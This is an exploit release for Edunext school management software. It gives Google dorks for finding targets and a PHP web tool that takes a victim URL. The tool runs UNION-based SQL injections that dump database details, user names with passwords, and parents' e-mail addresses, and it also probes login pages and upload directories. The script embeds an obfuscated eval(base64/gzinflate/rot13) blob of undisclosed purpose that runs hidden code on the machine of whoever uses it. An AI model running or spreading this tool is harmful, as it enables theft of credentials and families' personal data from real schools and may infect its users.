# Exploit Title: Edunext Systems + School Management Software ( Multiple SQL injection )
# Google Dork: inurl:/page.php?PAGE= , inurl:/image-gallery-detail.php?gal_id= , intext:Powered by Edunext Technologies
# Date: 2025-03-20
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://edunexttechnologies.com/
# Software Link: https://edunexttechnologies.com/school-management-software.php
# Version: 1.0
# Tested on: Windows 10

[code]


<?php
/*
Not Authenticated why an external server manages logins.
----------------------------------------------------------------------------
Edunext Systems are flawed ((Indian School Management CMS)Training Exploit)
----------------------------------------------------------------------------
emilianofebbi.1994 -at- gmail -dot- com

Author: Emiliano Febbi
nullsite.altervista.org
*/
echo'<html><head><title>Indian School Management CMS Multiple SQL injection</title><style>
body { cursor: crosshair; min-height: 100vh; }</style></head><body>
<body bgcolor="#000000"><body text="#00ffff"><body link="#808080"><body vlink="#808080">
<center><form action="'.$SERVER[PHP_SELF].'" method="POST">+ insert victim site +<br> 
<input type="text" name="victim_url" value="http://www.site.com/">
<td><font color="#ff0000"> or /dir/</font></td><br>
<font color="black">..</font>
<select name="select_bug" id="???"><option value="one">page.php?PAGE=</option>
<option value="two">image-gallery-detail</option><option value="iframe">#IFRAME=method</option></select><font color="red"> #Select bug</font>
<br><input type="text" name="num_var" value="2" style="height: 25px;width: 28px">
<font color="red">Page value: EX: 2</font><br>
<input type="submit" style="background-color:#00ffff" value="go!"/></form></center></body></html>';
print "<center>";
//           Main Server contains alla databases
//################ ---------> <---------- ##################
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
//################ ---------> <---------- ##################
print "</center>";
//#page.php?PAGE=
if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "one")) {
  $host = $_POST['victim_url'];
      $num = $_POST['num_var'];
   $bug = $_POST['select_bug'];
//portal Login and General Login
$Logins = array("login/login.php", "login/?next=");
foreach($Logins as $nullus_Logins) {
if (false!==file("$host$nullus_Logins")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Logins'>$nullus_Logins</a></div></center>";
};
print "<center>";
print "<font color='red'>#host:</font> $host<br>";
print "<font color='red'>#DB Version: </font>";
$sperimental = array('<div class="span8 data-table">', '</style>', '<div class="data">');
foreach($sperimental as $sperimentalx) {

     $getall=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10--");
     $getallz=explode("$sperimentalx",$getall);
     $getallz=explode("</div>",$getallz[1]);
          var_dump(strip_tags($getallz[0]));
print "<br><font color='red'>#DB Name: </font>";
     $getalll=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,database(),3,4,5,6,7,8,9,10--");
     $getallzz=explode("$sperimentalx",$getalll);
     $getallzz=explode("</div>",$getallzz[1]);
           var_dump(strip_tags($getallzz[0]));
} //???
$sperimentalz = array('<div class="span8 data-table">', '</style>', '<div class="data">');
foreach($sperimentalz as $sperimentaly) {
print "<br><font color='red'>#users:</font><br>";
$get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),3,4,5,6,7,8,9,10%20FROM%20users--");
     $usertbl=explode("$sperimentaly",$get_users);
     $usertbl=explode("</div>",$usertbl[1]);
          var_dump(strip_tags($usertbl[0]));
} //??? #2
$sperimentalzz = array('<div class="span8 data-table">', '</style>', '<div class="data">');
foreach($sperimentalzz as $sperimentalxy) {
print "<center>";
print "<br><font color='red'>#E-Mails Founds in database:</font><br>";
$get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(mother_email,+%20%27%3Cbr%20/%3E%27%20+,father_email),3,4,5,6,7,8,9,10%20FROM%20alumni_registration--");
     $usertbl=explode("$sperimentalxy",$get_users);
     $usertbl=explode("</div>",$usertbl[1]);
          var_dump(strip_tags($usertbl[0]));
print "</center>";
} //??? #3
if(file_get_contents("$host". "upload/")) {
print "<center><h2>#Lucky Strike</h2>";
$found_DIRt = file_get_contents("$host". "upload/");
print $found_DIRt;
print "</center>";
}
  };;;
//#image-gallery-detail
if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "two")) {
  $host = $_POST['victim_url'];
      $num = $_POST['num_var'];
   $bug = $_POST['select_bug'];
//portal Login and General Login
$Loginss = array("login/login.php", "login/?next=");
foreach($Loginss as $nullus_Loginss) {
if (false!==file("$host$nullus_Loginss")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Loginss'>$nullus_Loginss</a></div></center>";
};
print "<center>";
print "<font color='red'>#host:</font> $host<br>";
print "<font color='red'>#DB Version: </font>";
$sperimental_gall = array('Image Gallery /', '', '');
foreach($sperimental_gall as $sperimental_gallery) {
$getallx=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
     $getallzx=explode("$sperimental_gallery",$getallx);
     $getallzx=explode("</span>",$getallzx[1]);
          var_dump(strip_tags($getallzx[0]));
      //.................OR..................
$getallxb=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
     $getallzxb=explode("$sperimental_gallery",$getallxb);
     $getallzxb=explode("</span>",$getallzxb[1]);
             var_dump(strip_tags($getallzxb[0]));
      //.................OR..................
$getallxbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
     $getallzxbc=explode("$sperimental_gallery",$getallxbc);
     $getallzxbc=explode("</p>",$getallzxbc[1]);
           var_dump(strip_tags($getallzxbc[0]));
print "<center><br><font color='red'>#DB Name: </font>";
//#database();
$getallxdb=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
     $getallzxdb=explode("$sperimental_gallery",$getallxdb);
     $getallzxdb=explode("</span>",$getallzxdb[1]);
          var_dump(strip_tags($getallzxdb[0]));
$getallxdbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
     $getallzxdbc=explode("$sperimental_gallery",$getallxdbc);
     $getallzxdbc=explode("</span>",$getallzxdbc[1]);
          var_dump(strip_tags($getallzxdbc[0]));
$getallxdbcd=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
     $getallzxdbcd=explode("$sperimental_gallery",$getallxdbcd);
     $getallzxdbcd=explode("</p>",$getallzxdbcd[1]);
             var_dump(strip_tags($getallzxdbcd[0]));          
print "</center>";          
        }
         //beyond
         //Variant 1#
$sperimental_gallv = array('Image Gallery /', '', '');
foreach($sperimental_gallv as $sperimental_galleryvv) {
print "<center><br><font color='red'>#users:<br></font>";
$getallxk=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
     $getallzxk=explode("$sperimental_galleryvv",$getallxk);
     $getallzxk=explode("</span>",$getallzxk[1]);
             var_dump(strip_tags($getallzxk[0]));
print "</center>";
       //Variant 2#
$getallxdbcww=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
     $getallzxdbcww=explode("$sperimental_galleryvv",$getallxdbcww);
     $getallzxdbcww=explode("</div>",$getallzxdbcww[1]);
                var_dump(strip_tags($getallzxdbcww[0]));       
      //Variant 3#
print "<center>";
$getallxdbcwwxx=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
     $getallzxdbcwwxx=explode("$sperimental_galleryvv",$getallxdbcwwxx);
     $getallzxdbcwwxx=explode("</p>",$getallzxdbcwwxx[1]);
                var_dump(strip_tags($getallzxdbcwwxx[0]));
print "</center>";
}
//#Dir trav.
if(file_get_contents("$host". "upload/")) {
print "<center><h2>#Lucky Strike</h2>";
$found_DIRt = file_get_contents("$host". "upload/");
print $found_DIRt;
print "</center>";
}
        };;;;
//#IFRAME method=100% success
//--IF you usage this method select well value page or try random value--
if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "iframe")) {
  $host = $_POST['victim_url'];
      $num = $_POST['num_var'];
   $bug = $_POST['select_bug'];
print "<center>";
//portal Login and General Login
$Loginssx = array("login/login.php", "login/?next=");
foreach($Loginssx as $nullus_Loginssx) {
if (false!==file("$host$nullus_Loginssx")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Loginssx'>$nullus_Loginssx</a></div></center>";
};
print "<br><TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
print "page.php?PAGE=<br>";
print "<font color='red'>#DB Version ~ #DB Name:<br></font>";
print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%20database(),version(),3,4,5,6,7,8,9,10--' style='border:3px solid aqua;'></iframe><br>";
print "<font color='red'>#users:<br></font>";
print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),3,4,5,6,7,8,9,10%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
print "<font color='red'>#E-mails:<br></font>";
print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(mother_email,+%20%27%3Cbr%20/%3E%27%20+,father_email),3,4,5,6,7,8,9,10%20FROM%20alumni_registration--' style='border:3px solid aqua;'></iframe><br>";
print "</td></tr><table>";
          //#Variant 1
print "<TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
print "Image-Gallery-Detail.php?gal_id=<br>";
print "<font color='red'>#DB Version:<br>:</font>";
print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--' style='border:3px solid aqua;'></iframe><br>";
print "<font color='red'>#DB Name:<br>:</font>";
print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--' style='border:3px solid aqua;'></iframe><br>";
print "<font color='red'>#users:<br>:</font>";
print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
print "</td></tr><table>";
          //#Variant 2
print "<TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
print "image-gallery-detail.php?gal_id=<br>";
print "<font color='red'>#DB Version:<br>:</font>";
print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--' style='border:3px solid aqua;'></iframe><br>";
print "<font color='red'>#DB Name:<br>:</font>";
print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--' style='border:3px solid aqua;'></iframe><br>";
print "<font color='red'>#users:<br>:</font>";
print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
print "</td></tr><table>";
print "</center>";
};;;;;           
?>
[/code]